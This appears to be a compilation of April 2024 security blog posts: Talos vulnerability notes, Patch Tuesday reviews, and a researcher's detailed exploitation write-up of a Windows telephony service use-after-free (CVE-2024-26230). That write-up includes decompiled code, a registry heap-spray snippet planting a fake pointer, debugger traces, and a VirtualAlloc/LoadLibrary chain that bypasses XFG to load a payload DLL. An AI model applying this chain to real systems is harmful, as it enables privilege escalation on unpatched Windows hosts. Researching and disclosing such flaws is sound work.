An improper input validation vulnerability (TALOS-2024-1949/CVE-2024-27201) also exists in the OAS Engine User Configuration functionality that could lead to unexpected data in the configuration, including possible decoy usernames that contain characters not usually allowed by the software’s configuration. 

Arbitrary write vulnerabilities in AMD graphics driver 

Discovered by Piotr Bania. 

There are two out-of-bounds write vulnerabilities in the AMD Radeon user mode driver for DirectX 11. TALOS-2023-1847 and TALOS-2023-1848 could allow an attacker with access to a malformed shader to potentially achieve arbitrary code execution after causing an out-of-bounds write. 

AMD graphics drivers are software that allows graphics processing units (GPUs) to communicate with the operating system.  

These vulnerabilities could be triggered from guest machines running virtualization environments to perform guest-to-host escape. Theoretically, an adversary could also exploit these issues from a web browser. Talos has demonstrated with past, similar, vulnerabilities that they could be triggered from HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host. 

A trick, the story of CVE-2024-26230

Author: k0shl of Cyber Kunlun

Summary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is a RPC based service which is not running by default, but it could be actived by invoking StartServiceW API with normal user privilege.

There are only three functions in telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0, 
    [in]long arg_1, 
    [out]long *arg_2, 
    [in][string] wchar_t* arg_3, 
    [in][string] wchar_t* arg_4);

void ClientRequest(
    [in][context_handle] void* arg_0, 
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, 
    [in]long arg_2, 
    [in][out]long *arg_3);

void ClientDetach(
    [in][out][context_handle] void** arg_0);
} 

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
[...]
if ( object )
      {
        *object = 0x474F4C44; // =====> [a]
        v38 = *(_QWORD *)(contexthandle + 184);
        *((_QWORD *)object + 10) = v38;
        if ( v38 )
          *(_QWORD *)(v38 + 72) = object;
        *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
        a2[8] = object[22];
      }
[...]
}

As the code above, service stores the magic value 0x474F4C44(GOLD) into the object[a] and inserts object into the context handle object[b].Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

    v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
    if ( v28
      && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
          *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object )
    {

However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
[...]
v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object
[...]
  // free the object
}

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
[...]
 v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
[...]
case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
[...]

 if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
[...]
}

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
 r8=000000ec0f9bea30  r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e            cmp     dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP          RetAddr               Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295     tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc     tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809     tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6     RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935     RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4     RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4     RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27     RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e     RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea     RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51     RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58     KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03     ntdll!TppIopExecuteCallback+0x198

Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So, I need to ensure whether there is a suitable object in the telephony service. There is a small tip that I don't even need an 'object.' What I want is just a memory allocation that I can control both size and content.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
  {
    if ( !RegOpenKeyExW(
            phkResult,
            L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
            0,
            0x20019u,
            &hKey) )
    {
      GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
      RegCloseKey(hKey);
    }
    
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
  {
    [...]
  }
  else
  {
    v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
    v7 = (wchar_t *)v6;
    if ( v6 )
    {
      *(_WORD *)v6 = 34;
      LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
      [...]
  }

In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

After ensure there is a suitable primitive, I think it's time to perform heap feng shui now. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.

  1. First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
  2. Then, I free some of them to create some holes using the "FreeDiagInstance" function.
  3. Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
  4. After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
  5. Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.

XFG mitigation

After the final step of heap fengshui in the previous section, the controlled key value heap occupies the target hole, and when I invoke "TUISPIDLLCallback" function to trigger the "use" step, as the pseudo code above, controlled buffer is the input buffer of RPC interface, if I set it to 3, it will compare a magic value with the worker object, then obtain a virtual function address from the worker object, so that I only need to set this two value in the content of registry key value.

    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
    RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
    BYTE lpbuffer[0x5e] = { 0 };
    *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
    *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
    RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I can use ROP if there isn't XFG mitigation. However, XFG will limit the RIP register from jumping to a ROP gadget address, causing an INT29 exception when the control flow check fails.

Last step, the truely challenge

Just like the exploitation I introduced in my previous blog post—the exploitation of CNG key isolation—when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual address to the LoadLibrary address.

Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
  1. The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
  2. The second parameter is also obtained from a RPC input buffer, but it must be a const value, it's equal to the case number I mentioned in previous section, it must be 3.
  3. The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
  4. The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load payload DLL, I need to find out another way to complete the exploitation. At this time, I want to find a indirectly function to load payload DLL, because the third parameter is a pointer and the content of it I could control, I need a function has the following code:

func(a1, a2, a3, ...){
[...]
    path = a3;
    LoadLibarary(path);
[...]
}

The limitation in this scenario is that I can't control which DLL is loaded in the RPC server. Therefore, I can only use existing DLLs in the RPC server, which takes some time for me to find an eligible function. But it's failed to find an eligible function.

It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.

The trick

After some time, I remember an interesting API -- VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.

I notice that I can allocate a 32-bits address with this function!

The second parameter is a constant value representing the buffer size to allocate. However, it's not necessary for my purpose. The last parameter is a controlled DWORD value, which I can set to the value for flProtect. I could set it to PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
[...]
}
*controlledbuffer = result;
return result;

The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.

But I still can't predict the low 32-bits value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocate buffer size to find out if there is any regularity. Actually, the maximum size of the RPC client could be set is larger than 0x40000000. When I set the allocate size to 0x40000000, I found an interesting situation.

I find out that when the allocate size is set to 0x40000000, the low 32-bits address of the pointer increases linearly, which makes it predictable.

That means, for example, if the leaked low 32-bits return 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32-bits will be 0xfd800000. Additionally, the offset of the third parameter couldn't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bits address is larger than 0xc0000000. In this way, the low 32-bits of the third parameter could be a DWORD value larger than 0x100000000 after the address is added with the offset. It's possible to set the third parameter to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).

As for now, I make heap fengshui and control the all content of the heap hole with the controllable registry key value, and for bypassing XFG mitigation, I need to first leak the low 32-bits address by setting the MIDL_user_allocate function address in key value, and then set the VirtualAlloc function address in key value, obviously, it doesn't end if I allocate 32-bits address succeed, I need to invoke "TUISPIDLLCallback" multiple times to complete bypassing XFG mitigation. The good news is that I could control the timing of "use", so all I need to do is free the registry key value heap, set the new key value with the target function address, allocate a new key value heap, and use it again.

tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000    call    qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700  jmp     qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc              int     3
00007fff`aeae3bf8 cc              int     3
00007fff`aeae3bf9 cc              int     3
00007fff`aeae3bfa cc              int     3
00007fff`aeae3bfb cc              int     3
00007fff`aeae3bfc cc              int     3
00007fff`aeae3bfd cc              int     3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, we can see that every parameter satisfies the request. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.

0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0            test    eax,eax
0:007> dq ba000000
00000000`ba000000  00000000`00000000 00000000`00000000
00000000`ba000010  00000000`00000000 00000000`00000000
00000000`ba000020  00000000`00000000 00000000`00000000
00000000`ba000030  00000000`00000000 00000000`00000000
00000000`ba000040  00000000`00000000 00000000`00000000

This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.

0:009> dc ba000000
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.

There is one step last is invoking LoadLibrary to load payload DLL.

0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0          xor     r8d,r8d
00007fff`ad1f2483 33d2            xor     edx,edx
00007fff`ad1f2485 e9e642faff      jmp     KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc              int     3
00007fff`ad1f248b cc              int     3
00007fff`ad1f248c cc              int     3
00007fff`ad1f248d cc              int     3
00007fff`ad1f248e cc              int     3
0:009> dc rcx
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
00000000`ba000050  00000000 00000000 00000000 00000000  ................
00000000`ba000060  00000000 00000000 00000000 00000000  ................
00000000`ba000070  00000000 00000000 00000000 00000000  ................
0:009> k
 # Child-SP          RetAddr               Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2     KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a     tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13     tapisrv!ClientRequest+0xba

April’s Patch Tuesday includes 150 vulnerabilities, 60 which could lead to remote code execution

April’s Patch Tuesday includes 150 vulnerabilities, 60 which could lead to remote code execution

In one of the largest Patch Tuesdays in years, Microsoft disclosed 150 vulnerabilities across its software and product portfolio this week, including more than 60 that could lead to remote code execution. 

Though April’s monthly security update from Microsoft is the largest since at least the start of 2023, only three of the issues disclosed are considered “critical,” all of which are remote code execution vulnerabilities in Microsoft Defender for IoT.  

Most of the remainder of the security issues are considered “important,” and only two are “moderate” severity. 

The three critical vulnerabilities — CVE-2024-21322, CVE-2024-21323 and CVE-2024-29053 — are all remote code execution vulnerabilities in Microsoft Defender for IoT. Though little information is provided on how these issues could be exploited, Microsoft did state that exploitation of these vulnerabilities is “less likely.”  

There are also three vulnerabilities Talos would like to highlight, as Microsoft as deemed them "more likely" to be exploited: 

  • CVE-2024-26241: Elevation of privilege vulnerability in Win32k 
  • CVE-2024-28903: Security feature bypass vulnerability in Windows Secure Boot 
  • CVE-2024-28921: Security feature bypass vulnerability in Windows Secure Boot 

More than half of the code execution vulnerabilities exist in Microsoft SQL drivers. An attacker could exploit these vulnerabilities by tricking an authenticated user into connecting to an attacker-created SQL server via ODBC, which could result in the client receiving a malicious network packet. This could allow the adversary to execute code remotely on the client. 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63254 - 63257, 63265 - 63271, 63274 and 63275. There are also Snort 3 rules 300873, 300874 and 300877 - 300879.

Toward greater transparency: Adopting the CWE standard for Microsoft CVEs

At the Microsoft Security Response Center (MSRC), our mission is to protect our customers, communities, and Microsoft from current and emerging threats to security and privacy. One way we achieve this is by determining the root cause of security vulnerabilities in Microsoft products and services. We use this information to identify vulnerability trends and provide this data to our Product Engineering teams to enable them to systematically understand and eradicate security risks.

The April 2024 Security Updates Review

It’s the second Tuesday of the month, and Adobe and Microsoft have released a fresh crop of security updates. Take a break from your other activities and join us as we review the details of their latest advisories. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for April 2024

For April, Adobe released nine patches addressing 24 CVEs in Adobe After Effects, Photoshop, Commerce, InDesign, Experience Manager, Media Encoder, Bridge, Illustrator, and Adobe Animate. The largest of these updates is for Experience Manager, however, all of the bugs being patched are simple Cross-site Scripting (XSS) bugs. Still, if exploited, these Important-severity bugs could lead to code execution if exploited. The only other patches that address multiple CVEs are the fixes for Animate and Commerce. The patch for Animate addresses four bugs. Two of these are rated Critical and could lead to arbitrary code execution. The patch for Commerce also fixes two Critical-rated bugs, one XSS and one improper input validation bug. Both could lead to code execution.

Then we have several patches that are all info leaks due to an Out-Of-Bounds (OOB) read. These were all reported by the same person, and it makes me wonder if there is shared code between these products that makes them all vulnerable. In any case, After Effects, Photoshop, InDesign, Bridge, and Illustrator all fall into this category. That just leaves the update for Media Encoder. This patch fixes a single buffer overflow that could lead to code execution.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for April 2024

This month, Microsoft released a whopping 147 new CVEs in Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and Visual Studio; SQL Server; DNS Server; Windows Defender; Bitlocker; and Windows Secure Boot. If you include the third-party CVEs being documented this month, the CVE count comes to 155. A total of three of these bugs came through the ZDI program. None of the bugs disclosed at Pwn2Own Vancouver are fixed with this release.

Of the new patches released today, only three are rated Critical, 142 are rated Important, and two are rated Moderate in severity. This is the largest release from Microsoft this year and the largest since at least 2017. As far as I can tell, it’s the largest Patch Tuesday release from Microsoft of all time. It’s not clear if this is due to a backlog from the slower months or a surge in vulnerability reporting. It will be interesting to see which trend continues.

None of the CVEs released today are listed as currently under active attack and none are listed as publicly known at the time of release. However, the bug reported by ZDI threat hunter Peter Girnus was found in the wild. We have evidence this is being exploited in the wild, and I’m listing it as such.

Let’s take a closer look at some of the more interesting updates for this month, starting with a bug we consider to be currently exploited in the wild:

-       CVE-2024-29988 – SmartScreen Prompt Security Feature Bypass Vulnerability
This is an odd one, as a ZDI threat researcher found this vulnerability being in the wild, although Microsoft currently doesn’t list this as exploited. I would treat this as in the wild until Microsoft clarifies. The bug itself acts much like CVE-2024-21412 – it bypasses the Mark of the Web (MotW) feature and allows malware to execute on a target system. Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass MotW.

-       CVE-2024-20678 – Remote Procedure Call Runtime Remote Code Execution Vulnerability
There is a long history of RPC exploits being seen in the wild, so any RPC bug that could lead to code execution turns heads. This bug does require authentication, but it doesn’t require any elevated permission. Any authenticated user could hit it. It’s not clear if you could hit this if you authenticated as Guest or an anonymous user. A quick search shows about 1.3 million systems with TCP port 135 exposed to the internet. I expect a lot of people will be looking to exploit this in short order.

-       CVE-2024-20670 – Outlook for Windows Spoofing Vulnerability
This bug is listed as a spoofing bug, but based on the end result of exploitation, I would consider this information disclosure. In this case, the information disclosed would be NTLM hashes, which could then be used for Spoofing targeted users. Either way, a user would need to click something in an email to trigger this vulnerability. The Preview Pane is NOT an attack vector. However, we have seen a rash of NTLM relaying bugs over the last few months. With the wide user base of Outlook, this will likely be targeted by threat actors in the coming months.

-       CVE-2024-26221 – Windows DNS Server Remote Code Execution Vulnerability
This is one of seven DNS RCE bugs being patched this month and all are documented identically. These bugs allow RCE on an affected DNS server if the attacker has the privileges to query the DNS server. There is a timing factor here as well, but if the DNS queries are timed correctly, the attacker can execute arbitrary code on the target server. Although not specifically stated, it seems logical that the code execution would occur at the level of the DNS service, which is elevated. I really don’t need to tell you that your DNS servers are critical targets, so please take these bugs seriously and test and deploy the patches quickly.

Here’s the full list of CVEs released by Microsoft for April 2024:

*Note that post-release, Microsoft confirmed CVE-2024-26234 is also under active attack. The table has been updated to reflect this new information

CVE Title Severity CVSS Public Exploited Type
CVE-2024-29988 SmartScreen Prompt Security Feature Bypass Vulnerability Important 8.8 No Yes RCE
CVE-2024-26234 Proxy Driver Spoofing Vulnerability Important 6.7 Yes Yes Spoofing
CVE-2024-21322 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 7.2 No No RCE
CVE-2024-21323 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 8.8 No No RCE
CVE-2024-29053 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 8.8 No No RCE
CVE-2024-21409 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-29063 † Azure AI Search Information Disclosure Vulnerability Important 7.3 No No Info
CVE-2024-28917 † Azure Arc-enabled Kubernetes Extension Cluster-Scope Elevation of Privilege Vulnerability Important 6.2 No No EoP
CVE-2024-21424 † Azure Compute Gallery Elevation of Privilege Vulnerability Important 6.5 No No EoP
CVE-2024-29993 Azure CycleCloud Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-26193 † Azure Migrate Remote Code Execution Vulnerability Important 6.4 No No RCE
CVE-2024-29989 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 8.4 No No EoP
CVE-2024-20665 BitLocker Security Feature Bypass Vulnerability Important 6.1 No No SFB
CVE-2024-26212 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-26215 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-26195 DHCP Server Service Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26202 DHCP Server Service Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26219 HTTP.sys Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-2201 * Intel: CVE-2024-2201 Branch History Injection Important 4.7 No No Info
CVE-2024-23593 * Lenovo: CVE-2024-23593 Zero Out Boot Manager and drop to UEFI Shell Important 7.8 No No SFB
CVE-2024-23594 * Lenovo: CVE-2024-23594 Stack Buffer Overflow in LenovoBT.efi Important 6.4 No No SFB
CVE-2024-26256 libarchive Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-29990 † Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability Important 9 No No EoP
CVE-2024-26213 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-28904 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-28905 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-28907 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-21324 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP
CVE-2024-29054 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP
CVE-2024-29055 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP
CVE-2024-26257 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-26158 Microsoft Install Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26209 Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-26208 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26232 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-28929 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28930 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28931 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28932 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28933 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28934 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28935 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28936 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28937 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
